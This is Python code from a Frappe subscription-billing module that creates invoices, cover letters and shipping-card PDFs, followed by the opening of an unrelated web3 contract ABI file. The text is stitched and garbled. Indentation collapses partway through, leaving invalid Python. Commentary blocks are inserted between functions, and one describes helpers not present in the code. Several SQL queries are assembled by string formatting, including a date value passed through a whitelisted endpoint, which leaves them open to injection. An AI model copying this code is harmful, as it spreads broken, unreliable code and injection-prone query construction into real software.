                                        AND {filter_invoice_typ}
                                        AND `name` NOT IN ({filter_keine_doppel_rechnung}){filter_inland_adressen} ORDER BY `magazines_qty_ir` ASC{limit_filter}""".format(filter_invoice_typ=filter_invoice_typ, filter_keine_doppel_rechnung=filter_keine_doppel_rechnung, filter_inland_adressen=filter_inland_adressen, limit_filter=limit_filter), as_dict=True)
        for inland_abo in inland_abos:
            abos.append(inland_abo)

        # create log file
        rm_log = frappe.get_doc({
            "doctype": "RM Log",
            'start': now(),
            'status': 'Job gestartet',
            'typ': 'Rechnungen (1+ Ex.)' if selected_type == 'invoice_inkl' else 'Rechnungen (0 Ex.)'
        })
        rm_log.insert()
        frappe.db.commit()

        for _abo in abos:
            abo = frappe.get_doc("mp Abo", _abo.name)
            sinv = create_invoice(abo.name, date)
            if sinv:
                # update abo
                row = abo.append('sales_invoices', {})
                row.sales_invoice = sinv['sinv']
                row.year = year
                abo.save(ignore_permissions=True)
                frappe.db.commit()
                # update log file
                sinv_row = rm_log.append('sinvs', {})
                sinv_row.sinv = sinv['sinv']
                if not sinv['send_as_mail']:
                    sinv_row.pdf = 1
                else:
                    sinv_row.e_mail = 1
                sinv_row.abo = abo.name
                sinv_row.anz = abo.magazines_qty_ir
                sinv_row.recipient_name = abo.recipient_name
                rm_log.save(ignore_permissions=True)
                frappe.db.commit()
                if not sinv['send_as_mail']:
                    if selected_type == 'invoice_inkl':
                        if abo.magazines_qty_ir == 1:
                            qty_one += 1
                        else:
                            qty_multi += 1

        # create combined PDF
        print_pdf(rm_log.name)

        # update log file
        rm_log.ende = now()
        rm_log.status = 'PDF erstellt'
        rm_log.qty_one = qty_one
        rm_log.qty_multi = qty_multi
        rm_log.save(ignore_permissions=True)
        frappe.db.commit()
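`_create_invoices` splits the invoice run into chunks of at most `limit` subscriptions and derives the number of passes with `math.ceil`. The helper below (a stand-alone sketch; `batch_count` is a hypothetical name, not part of the module) isolates that computation:

```python
import math

def batch_count(total_qty, limit):
    # Number of batches needed to process total_qty items in chunks of at
    # most `limit` items each -- mirrors batch_anz = math.ceil(total_qty / limit).
    return math.ceil(total_qty / limit)

print(batch_count(1200, 500))
```

With 1200 matching subscriptions and the default limit of 500, the run is processed in three batches (500 + 500 + 200); because already-invoiced subscriptions are filtered out via `tabmp Abo Invoice`, each batch picks up where the previous one stopped.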


def create_invoice(abo, date):
    from mietrechtspraxis.mietrechtspraxis.doctype.mp_abo.mp_abo import get_price
    abo = frappe.get_doc("mp Abo", abo)
    try:
        new_sinv = frappe.get_doc({
            "doctype": "Sales Invoice",
            "set_posting_time": 1,
            "posting_date": date,
            "posting_time": "00:00:00",
            "customer": abo.invoice_recipient,
            "customer_address": abo.recipient_address,
            "contact_person": abo.recipient_contact,
            "items": [
                {
                    "item_code": frappe.db.get_single_value('mp Abo Settings', 'jahres_abo'),
                    "qty": abo.qty_next_invoice,
                    "rate": get_price(frappe.db.get_single_value('mp Abo Settings', 'jahres_abo'), abo.invoice_recipient)
                }
            ]
        })
        new_sinv.insert()
        new_sinv.esr_reference = get_qrr_reference(sales_invoice=new_sinv.name, customer=abo.invoice_recipient)
        new_sinv.save(ignore_permissions=True)
        new_sinv.submit()
        frappe.db.commit()

        customer = frappe.get_doc("Customer", abo.invoice_recipient)
        if customer.korrespondenz == 'E-Mail':
            contact = frappe.get_doc("Contact", abo.recipient_contact)
            if contact.email_id:
                send_as_mail = True
                mail = contact.email_id
                if abo.magazines_qty_ir > 0:
                    printformat = 'Jahresrechnung inkl'
                else:
                    printformat = 'Jahresrechnung exkl'
                send_invoice_as_mail(new_sinv.name, mail, printformat)
                new_sinv.sended_as_mail = 1
                new_sinv.save()
                frappe.db.commit()
            else:
                send_as_mail = False
                mail = ''
        else:
            send_as_mail = False
            mail = ''
        return {
            'sinv': new_sinv.name,
            'send_as_mail': send_as_mail,
            'mail': mail
        }
    except Exception:
        frappe.log_error(frappe.get_traceback(), 'create_invoice failed: {abo}'.format(abo=abo.name))
        return False
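`create_invoice` stamps each invoice with a QRR (ESR) reference from the project's `get_qrr_reference` utility, whose implementation is not shown in this file. Swiss QR references end in a check digit computed with the standard modulo-10 recursive algorithm; the sketch below illustrates that algorithm as a stand-alone function, and is an assumption about the general scheme rather than the project's actual code:

```python
# Lookup table of the standard modulo-10 recursive algorithm used for
# Swiss QRR/ESR payment references.
_MOD10_TABLE = [0, 9, 4, 6, 8, 2, 7, 1, 3, 5]

def mod10_recursive_check_digit(digits):
    # Fold every digit into a running carry via the lookup table, then
    # derive the check digit from the final carry.
    carry = 0
    for ch in digits:
        carry = _MOD10_TABLE[(carry + int(ch)) % 10]
    return (10 - carry) % 10
```

A 27-digit QRR reference is then the 26-digit base number followed by this check digit; for an all-zero base the check digit is 0.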


def send_invoice_as_mail(sinv, address, printformat):
    try:
        frappe.sendmail([address],
                        subject=_("New Invoice: {sinv}").format(sinv=sinv),
                        reply_to='office@mietrecht.ch',
                        message=_("Please find attached Invoice {sinv}").format(sinv=sinv),
                        attachments=[frappe.attach_print('Sales Invoice', sinv, file_name=sinv, print_format=printformat)])
    except Exception:
        frappe.log_error(frappe.get_traceback(), 'send_invoice_as_mail failed: {sinv}'.format(sinv=sinv))


def print_pdf(rm_log):
    bind_source = "/assets/mietrechtspraxis/sinvs_for_print/{date}.pdf".format(date=rm_log)
    physical_path = "/home/frappe/frappe-bench/sites" + bind_source
    dest = str(physical_path)
    invoices = frappe.db.sql("""SELECT `sinv`, `anz` FROM `tabRM Log Sinv` WHERE `parent` = '{rm_log}' AND `pdf` = 1 AND `e_mail` != 1 ORDER BY `idx` ASC""".format(rm_log=rm_log), as_list=True)
    output = PdfFileWriter()
    for invoice in invoices:
        try:
            if int(invoice[1]) > 0:
                output = frappe.get_print("Sales Invoice", invoice[0], 'Jahresrechnung inkl', as_pdf=True, output=output, no_letterhead=1, ignore_zugferd=True)
            else:
                output = frappe.get_print("Sales Invoice", invoice[0], 'Jahresrechnung exkl', as_pdf=True, output=output, no_letterhead=1, ignore_zugferd=True)
        except Exception:
            frappe.log_error(frappe.get_traceback(), 'print_pdf failed: {sinv}'.format(sinv=invoice[0]))
    if isinstance(dest, str):  # when dest is a file path
        destdir = os.path.dirname(dest)
        if destdir != '' and not os.path.isdir(destdir):
            os.makedirs(destdir)
        with open(dest, "wb") as w:
            output.write(w)
    else:  # when dest is io.IOBase
        output.write(dest)
    return bind_source
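The tail of `print_pdf` accepts either a filesystem path (create the parent directory on demand, then write binary) or a writable file object. That destination handling can be exercised stand-alone; `write_bytes` below is a hypothetical helper mirroring the pattern, and the tempfile path is illustrative:

```python
import os
import tempfile

def write_bytes(dest, payload):
    # Mirrors the dest handling in print_pdf: a str is treated as a file
    # path whose parent directory is created on demand; anything else is
    # assumed to be a writable binary file-like object.
    if isinstance(dest, str):
        destdir = os.path.dirname(dest)
        if destdir != '' and not os.path.isdir(destdir):
            os.makedirs(destdir)
        with open(dest, 'wb') as w:
            w.write(payload)
    else:
        dest.write(payload)

target = os.path.join(tempfile.mkdtemp(), 'out', 'batch.pdf')
write_bytes(target, b'%PDF-1.4 demo')
print(os.path.exists(target))
```

In `print_pdf` itself `dest` is always built from a hard-coded bench path, so only the string branch is taken; the file-object branch is kept for callers that pass an `io.BytesIO`.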


@frappe.whitelist()
def create_begleitschreiben():
    args = {}
    enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print.create_begleitschreiben_kuendigung", queue='long', job_name='Begleitschreiben: Kündigungen', timeout=5000, **args)
    enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print.create_begleitschreiben_gratis_abo", queue='long', job_name='Begleitschreiben: Gratis Abos', timeout=5000, **args)
    enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print.create_begleitschreiben_jahres_abo", queue='long', job_name='Begleitschreiben: Jahres-Abo Empfänger', timeout=5000, **args)


def create_begleitschreiben_kuendigung():
    rm_log = frappe.get_doc({
        "doctype": "RM Log",
        'start': now(),
        'status': 'Job gestartet',
        'typ': 'Begleitschreiben: Kündigungen Ausland'
    })
    rm_log.insert()
    frappe.db.commit()

    ausland_datas = frappe.db.sql("""
        SELECT
            `view`.`abo` AS `abo`,
            `view`.`anz` AS `anz`,
            `view`.`recipient_name` AS `recipient_name`,
            `view`.`recipient_contact` AS `recipient_contact`,
            `view`.`recipient_address` AS `recipient_address`
        FROM (
            SELECT
                `name` AS `abo`,
                `magazines_qty_ir` AS `anz`,
                `invoice_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo`
            WHERE `status` = 'Actively terminated'
            AND `type` = 'Jahres-Abo'
            AND `magazines_qty_ir` > 0
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
            UNION
            SELECT
                `parent` AS `abo`,
                `magazines_qty_mr` AS `anz`,
                `magazines_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo Recipient`
            WHERE `parent` IN (
                SELECT
                    `name`
                FROM `tabmp Abo`
                WHERE `status` = 'Actively terminated'
                AND `type` = 'Jahres-Abo'
            )
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
            UNION
            SELECT
                `parent` AS `abo`,
                `magazines_qty_mr` AS `anz`,
                `magazines_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo Recipient`
            WHERE `parent` IN (
                SELECT
                    `name`
                FROM `tabmp Abo`
                WHERE `status` = 'Active'
                AND `type` = 'Jahres-Abo'
            )
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
            AND `remove_recipient` IS NOT NULL
        ) AS `view`
        ORDER BY `view`.`anz` ASC
        """, as_dict=True)

    for ausland_data in ausland_datas:
        begleit_row = rm_log.append('begleitungen', {})
        customer_name = frappe.get_doc("Customer", ausland_data.recipient_name).customer_name
        begleit_row.recipient_name = customer_name
        begleit_row.recipient_customer = ausland_data.recipient_name
        # tbd!
        begleit_row.pdf = 1
        #---------------------
        begleit_row.drucken = 1
        begleit_row.abo = ausland_data.abo
        begleit_row.anz = ausland_data.anz
        begleit_row.recipient_contact = ausland_data.recipient_contact
        begleit_row.recipient_address = ausland_data.recipient_address
        rm_log.save(ignore_permissions=True)
        frappe.db.commit()

    rm_log.ende = now()
    rm_log.status = 'PDF erstellt'
    rm_log.save(ignore_permissions=True)
    frappe.db.commit()

    rm_log = frappe.get_doc({
        "doctype": "RM Log",
        'start': now(),
        'status': 'Job gestartet',
        'typ': 'Begleitschreiben: Kündigungen Inland'
    })
    rm_log.insert()
    frappe.db.commit()

    inland_datas = frappe.db.sql("""
        SELECT
            `view`.`abo` AS `abo`,
            `view`.`anz` AS `anz`,
            `view`.`recipient_name` AS `recipient_name`,
            `view`.`recipient_contact` AS `recipient_contact`,
            `view`.`recipient_address` AS `recipient_address`
        FROM (
            SELECT
                `name` AS `abo`,
                `magazines_qty_ir` AS `anz`,
                `invoice_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo`
            WHERE `status` = 'Actively terminated'
            AND `type` = 'Jahres-Abo'
            AND `magazines_qty_ir` > 0
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
            UNION
            SELECT
                `parent` AS `abo`,
                `magazines_qty_mr` AS `anz`,
                `magazines_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo Recipient`
            WHERE `parent` IN (
                SELECT
                    `name`
                FROM `tabmp Abo`
                WHERE `status` = 'Actively terminated'
                AND `type` = 'Jahres-Abo'
            )
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
            UNION
            SELECT
                `parent` AS `abo`,
                `magazines_qty_mr` AS `anz`,
                `magazines_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo Recipient`
            WHERE `parent` IN (
                SELECT
                    `name`
                FROM `tabmp Abo`
                WHERE `status` = 'Active'
                AND `type` = 'Jahres-Abo'
            )
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
            AND `remove_recipient` IS NOT NULL
        ) AS `view`
        ORDER BY `view`.`anz` ASC
        """, as_dict=True)

    for inland_data in inland_datas:
        begleit_row = rm_log.append('begleitungen', {})
        customer_name = frappe.get_doc("Customer", inland_data.recipient_name).customer_name
        begleit_row.recipient_name = customer_name
        begleit_row.recipient_customer = inland_data.recipient_name
        # tbd!
        begleit_row.pdf = 1
        #---------------------
        begleit_row.drucken = 1
        begleit_row.abo = inland_data.abo
        begleit_row.anz = inland_data.anz
        begleit_row.recipient_contact = inland_data.recipient_contact
        begleit_row.recipient_address = inland_data.recipient_address
        rm_log.save(ignore_permissions=True)
        frappe.db.commit()

    rm_log.ende = now()
    rm_log.status = 'PDF erstellt'
    rm_log.save(ignore_permissions=True)
    frappe.db.commit()


def create_begleitschreiben_gratis_abo():
    qty_one = 0
    qty_multi = 0
    rm_log = frappe.get_doc({
        "doctype": "RM Log",
        'start': now(),
        'status': 'Job gestartet',
        'typ': 'Begleitschreiben: Gratis Abos Ausland'
    })
    rm_log.insert()
    frappe.db.commit()

    ausland_datas = frappe.db.sql("""
        SELECT
            `view`.`abo` AS `abo`,
            `view`.`anz` AS `anz`,
            `view`.`recipient_name` AS `recipient_name`,
            `view`.`recipient_contact` AS `recipient_contact`,
            `view`.`recipient_address` AS `recipient_address`
        FROM (
            SELECT
                `name` AS `abo`,
                `magazines_qty_ir` AS `anz`,
                `invoice_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo`
            WHERE `status` = 'Active'
            AND `type` = 'Gratis-Abo'
            AND `magazines_qty_ir` > 0
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
        ) AS `view`
        ORDER BY `view`.`anz` ASC
        """, as_dict=True)

    for ausland_data in ausland_datas:
        if ausland_data.anz == 1:
            qty_one += 1
        else:
            qty_multi += 1
        begleit_row = rm_log.append('begleitungen', {})
        customer_name = frappe.get_doc("Customer", ausland_data.recipient_name).customer_name
        begleit_row.recipient_name = customer_name
        begleit_row.recipient_customer = ausland_data.recipient_name
        # tbd!
        begleit_row.pdf = 1
        #---------------------
        begleit_row.drucken = 1
        begleit_row.abo = ausland_data.abo
        begleit_row.anz = ausland_data.anz
        begleit_row.recipient_contact = ausland_data.recipient_contact
        begleit_row.recipient_address = ausland_data.recipient_address
        rm_log.save(ignore_permissions=True)
        frappe.db.commit()

    rm_log.ende = now()
    rm_log.status = 'PDF erstellt'
    rm_log.qty_one = qty_one
    rm_log.qty_multi = qty_multi
    rm_log.save(ignore_permissions=True)
    frappe.db.commit()

    qty_one = 0
    qty_multi = 0
    rm_log = frappe.get_doc({
        "doctype": "RM Log",
        'start': now(),
        'status': 'Job gestartet',
        'typ': 'Begleitschreiben: Gratis Abos Inland'
    })
    rm_log.insert()
    frappe.db.commit()

    inland_datas = frappe.db.sql("""
        SELECT
            `view`.`abo` AS `abo`,
            `view`.`anz` AS `anz`,
            `view`.`recipient_name` AS `recipient_name`,
            `view`.`recipient_contact` AS `recipient_contact`,
            `view`.`recipient_address` AS `recipient_address`
        FROM (
            SELECT
                `name` AS `abo`,
                `magazines_qty_ir` AS `anz`,
                `invoice_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo`
            WHERE `status` = 'Active'
            AND `type` = 'Gratis-Abo'
            AND `magazines_qty_ir` > 0
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
        ) AS `view`
        ORDER BY `view`.`anz` ASC
        """, as_dict=True)

    for inland_data in inland_datas:
        if inland_data.anz == 1:
            qty_one += 1
        else:
            qty_multi += 1
        begleit_row = rm_log.append('begleitungen', {})
        customer_name = frappe.get_doc("Customer", inland_data.recipient_name).customer_name
        begleit_row.recipient_name = customer_name
        begleit_row.recipient_customer = inland_data.recipient_name
        # tbd!
        begleit_row.pdf = 1
        #---------------------
        begleit_row.drucken = 1
        begleit_row.abo = inland_data.abo
        begleit_row.anz = inland_data.anz
        begleit_row.recipient_contact = inland_data.recipient_contact
        begleit_row.recipient_address = inland_data.recipient_address
        rm_log.save(ignore_permissions=True)
        frappe.db.commit()

    rm_log.ende = now()
    rm_log.status = 'PDF erstellt'
    rm_log.qty_one = qty_one
    rm_log.qty_multi = qty_multi
    rm_log.save(ignore_permissions=True)
    frappe.db.commit()


def create_begleitschreiben_jahres_abo():
    qty_one = 0
    qty_multi = 0
    rm_log = frappe.get_doc({
        "doctype": "RM Log",
        'start': now(),
        'status': 'Job gestartet',
        'typ': 'Begleitschreiben: Jahres-Abo Empfänger Ausland'
    })
    rm_log.insert()
    frappe.db.commit()

    ausland_datas = frappe.db.sql("""
        SELECT
            `view`.`abo` AS `abo`,
            `view`.`anz` AS `anz`,
            `view`.`recipient_name` AS `recipient_name`,
            `view`.`recipient_contact` AS `recipient_contact`,
            `view`.`recipient_address` AS `recipient_address`
        FROM (
            SELECT
                `parent` AS `abo`,
                `magazines_qty_mr` AS `anz`,
                `magazines_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo Recipient`
            WHERE `parent` IN (
                SELECT
                    `name`
                FROM `tabmp Abo`
                WHERE `status` = 'Active'
                AND `type` = 'Jahres-Abo'
            )
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
            AND `remove_recipient` IS NULL
        ) AS `view`
        ORDER BY `view`.`anz` ASC
        """, as_dict=True)

    for ausland_data in ausland_datas:
        if ausland_data.anz == 1:
            qty_one += 1
        else:
            qty_multi += 1
        begleit_row = rm_log.append('begleitungen', {})
        customer_name = frappe.get_doc("Customer", ausland_data.recipient_name).customer_name
        begleit_row.recipient_name = customer_name
        begleit_row.recipient_customer = ausland_data.recipient_name
        # tbd!
        begleit_row.pdf = 1
        #---------------------
        begleit_row.drucken = 1
        begleit_row.abo = ausland_data.abo
        begleit_row.anz = ausland_data.anz
        begleit_row.recipient_contact = ausland_data.recipient_contact
        begleit_row.recipient_address = ausland_data.recipient_address
        rm_log.save(ignore_permissions=True)
        frappe.db.commit()

    rm_log.ende = now()
    rm_log.status = 'PDF erstellt'
    rm_log.qty_one = qty_one
    rm_log.qty_multi = qty_multi
    rm_log.save(ignore_permissions=True)
    frappe.db.commit()

    qty_one = 0
    qty_multi = 0
    rm_log = frappe.get_doc({
        "doctype": "RM Log",
        'start': now(),
        'status': 'Job gestartet',
        'typ': 'Begleitschreiben: Jahres-Abo Empfänger Inland'
    })
    rm_log.insert()
    frappe.db.commit()

    inland_datas = frappe.db.sql("""
        SELECT
            `view`.`abo` AS `abo`,
            `view`.`anz` AS `anz`,
            `view`.`recipient_name` AS `recipient_name`,
            `view`.`recipient_contact` AS `recipient_contact`,
            `view`.`recipient_address` AS `recipient_address`
        FROM (
            SELECT
                `parent` AS `abo`,
                `magazines_qty_mr` AS `anz`,
                `magazines_recipient` AS `recipient_name`,
                `recipient_contact` AS `recipient_contact`,
                `recipient_address` AS `recipient_address`
            FROM `tabmp Abo Recipient`
            WHERE `parent` IN (
                SELECT
                    `name`
                FROM `tabmp Abo`
                WHERE `status` = 'Active'
                AND `type` = 'Jahres-Abo'
            )
            AND `recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
            AND `remove_recipient` IS NULL
        ) AS `view`
        ORDER BY `view`.`anz` ASC
        """, as_dict=True)

    for inland_data in inland_datas:
        if inland_data.anz == 1:
            qty_one += 1
        else:
            qty_multi += 1
        begleit_row = rm_log.append('begleitungen', {})
        customer_name = frappe.get_doc("Customer", inland_data.recipient_name).customer_name
begleit_row.recipient_name = customer_name
begleit_row.recipient_customer = inland_data.recipient_name
# tbd!
begleit_row.pdf = 1
#---------------------
begleit_row.drucken = 1
begleit_row.abo = inland_data.abo
begleit_row.anz = inland_data.anz
begleit_row.recipient_contact = inland_data.recipient_contact
begleit_row.recipient_address = inland_data.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
rm_log.ende = now()
rm_log.status = 'PDF erstellt'
rm_log.qty_one = qty_one
rm_log.qty_multi = qty_multi
rm_log.save(ignore_permissions=True)
frappe.db.commit()
@frappe.whitelist()
def create_versandkarten(date):
args = {
'date': date
}
enqueue("mietrechtspraxis.mietrechtspraxis.page.invoice_and_print.invoice_and_print._create_versandkarten", queue='long', job_name='Generierung Sammel-PDF (Versandkarten)', timeout=5000, **args)
def _create_versandkarten(date):
data = []
qty_one = 0
qty_multi = 0
rm_log = frappe.get_doc({
"doctype": "RM Log",
'start': now(),
'status': 'Job gestartet',
'typ': 'Versandkarten'
})
rm_log.insert()
frappe.db.commit()
    bind_source = "/assets/mietrechtspraxis/sinvs_for_print/{name}.pdf".format(name=rm_log.name)
    physical_path = "/home/frappe/frappe-bench/sites" + bind_source
    dest = str(physical_path)
output = PdfFileWriter()
ausland_empfaenger = frappe.db.sql("""
SELECT
`view`.`recipient`,
`view`.`abo`,
`view`.`anz`,
`view`.`recipient_contact`,
`view`.`recipient_address`
FROM (
SELECT
`tabmp Abo`.`invoice_recipient` AS `recipient`,
`tabmp Abo`.`name` AS `abo`,
`tabmp Abo`.`magazines_qty_ir` AS `anz`,
`tabmp Abo`.`recipient_contact`,
`tabmp Abo`.`recipient_address`
FROM `tabmp Abo`
WHERE
(`tabmp Abo`.`status` = 'Active' OR (`tabmp Abo`.`status` = 'Actively terminated' AND `tabmp Abo`.`end_date` <= '{date}'))
AND `tabmp Abo`.`recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
AND `tabmp Abo`.`magazines_qty_ir` > 0
UNION
SELECT
`tabmp Abo Recipient`.`magazines_recipient` AS `recipient`,
`tabmp Abo Recipient`.`parent` AS `abo`,
`tabmp Abo Recipient`.`magazines_qty_mr` AS `anz`,
`tabmp Abo Recipient`.`recipient_contact`,
`tabmp Abo Recipient`.`recipient_address`
FROM `tabmp Abo Recipient`
WHERE `tabmp Abo Recipient`.`recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` != 'Schweiz')
AND `tabmp Abo Recipient`.`parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `tabmp Abo`.`status` = 'Active' OR (`tabmp Abo`.`status` = 'Actively terminated' AND `tabmp Abo`.`end_date` <= '{date}')
)
AND `tabmp Abo Recipient`.`magazines_qty_mr` > 0
) AS `view`
ORDER BY `view`.`anz` ASC
""".format(date=date), as_dict=True)
for empfaenger in ausland_empfaenger:
# create rm_log:
try:
customer = frappe.get_doc("Customer", empfaenger.recipient)
versand_row = rm_log.append('versandkarten', {})
versand_row.recipient_name = customer.customer_name
versand_row.abo = empfaenger.abo
versand_row.anz = empfaenger.anz
versand_row.recipient_contact = empfaenger.recipient_contact
versand_row.recipient_address = empfaenger.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
if empfaenger.anz > 1:
qty_multi += 1
else:
qty_one += 1
        except Exception:
            frappe.log_error(frappe.get_traceback(), 'create rm_log failed: {ref_dok}'.format(ref_dok=empfaenger.abo))
inland_empfaenger = frappe.db.sql("""
SELECT
`view`.`recipient`,
`view`.`abo`,
`view`.`anz`,
`view`.`recipient_contact`,
`view`.`recipient_address`
FROM (
SELECT
`tabmp Abo`.`invoice_recipient` AS `recipient`,
`tabmp Abo`.`name` AS `abo`,
`tabmp Abo`.`magazines_qty_ir` AS `anz`,
`tabmp Abo`.`recipient_contact`,
`tabmp Abo`.`recipient_address`
FROM `tabmp Abo`
WHERE
(`tabmp Abo`.`status` = 'Active' OR (`tabmp Abo`.`status` = 'Actively terminated' AND `tabmp Abo`.`end_date` <= '{date}'))
AND `tabmp Abo`.`recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
UNION
SELECT
`tabmp Abo Recipient`.`magazines_recipient` AS `recipient`,
`tabmp Abo Recipient`.`parent` AS `abo`,
`tabmp Abo Recipient`.`magazines_qty_mr` AS `anz`,
`tabmp Abo Recipient`.`recipient_contact`,
`tabmp Abo Recipient`.`recipient_address`
FROM `tabmp Abo Recipient`
WHERE `tabmp Abo Recipient`.`recipient_address` IN (SELECT `name` FROM `tabAddress` WHERE `country` = 'Schweiz')
AND `tabmp Abo Recipient`.`parent` IN (
SELECT
`name`
FROM `tabmp Abo`
WHERE `tabmp Abo`.`status` = 'Active' OR (`tabmp Abo`.`status` = 'Actively terminated' AND `tabmp Abo`.`end_date` <= '{date}')
)
) AS `view`
ORDER BY `view`.`anz` ASC
""".format(date=date), as_dict=True)
for empfaenger in inland_empfaenger:
# create rm_log:
try:
customer = frappe.get_doc("Customer", empfaenger.recipient)
versand_row = rm_log.append('versandkarten', {})
versand_row.recipient_name = customer.customer_name
versand_row.abo = empfaenger.abo
versand_row.anz = empfaenger.anz
versand_row.recipient_contact = empfaenger.recipient_contact
versand_row.recipient_address = empfaenger.recipient_address
rm_log.save(ignore_permissions=True)
frappe.db.commit()
if empfaenger.anz > 1:
qty_multi += 1
else:
qty_one += 1
        except Exception:
            frappe.log_error(frappe.get_traceback(), 'create rm_log failed: {ref_dok}'.format(ref_dok=empfaenger.abo))
try:
output = frappe.get_print("RM Log", rm_log.name, 'RM Log Versandkarten', as_pdf = True, output = output, no_letterhead = 1, ignore_zugferd=True)
    except Exception:
frappe.log_error(frappe.get_traceback(), 'print_pdf failed: {ref_dok}'.format(ref_dok=rm_log.name))
try:
if isinstance(dest, str): # when dest is a file path
destdir = os.path.dirname(dest)
if destdir != '' and not os.path.isdir(destdir):
os.makedirs(destdir)
with open(dest, "wb") as w:
output.write(w)
else: # when dest is io.IOBase
output.write(dest)
    except Exception:
frappe.log_error(frappe.get_traceback(), 'save_pdf failed: {ref_dok}'.format(ref_dok=rm_log.name))
rm_log.ende = now()
rm_log.qty_one = qty_one
rm_log.qty_multi = qty_multi
rm_log.status = 'PDF erstellt'
rm_log.save(ignore_permissions=True)
frappe.db.commit()
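The file-vs-stream branch at the end of `_create_versandkarten` (create the parent directory if needed, then write the PDF) can be exercised without Frappe or PyPDF2. This is a minimal sketch; `write_output` is a hypothetical helper name and plain bytes stand in for the `PdfFileWriter` object:

```python
import io
import os
import tempfile

def write_output(payload: bytes, dest):
    """Write payload to a file path (creating parent dirs) or to a binary stream."""
    if isinstance(dest, str):  # dest is a file path
        destdir = os.path.dirname(dest)
        if destdir and not os.path.isdir(destdir):
            os.makedirs(destdir)
        with open(dest, "wb") as w:
            w.write(payload)
    else:  # dest is an io.IOBase-like object
        dest.write(payload)

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "nested", "out.pdf")
    write_output(b"%PDF-1.4 demo", path)      # path branch creates 'nested/'
    print(os.path.exists(path))               # True

buf = io.BytesIO()
write_output(b"%PDF-1.4 demo", buf)           # stream branch writes in place
print(buf.getvalue() == b"%PDF-1.4 demo")     # True
```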
# --- profile/profile_v2.py (repo: sodapopinsky/dfk, MIT) ---
from web3 import Web3
CONTRACT_ADDRESS = '0x6391F796D56201D279a42fD3141aDa7e26A3B4A5'
ABI = """
[
{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"string","name":"name","type":"string"},{"indexed":false,"internalType":"uint64","name":"created","type":"uint64"},{"indexed":false,"internalType":"uint256","name":"nftId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"collectionId","type":"uint256"}],"name":"ProfileCreated","type":"event"},
{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"string","name":"name","type":"string"},{"indexed":false,"internalType":"uint256","name":"nftId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"collectionId","type":"uint256"}],"name":"ProfileUpdated","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},
{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},
{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MAX_CHAR","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MAX_PIC","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"MIN_CHAR","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
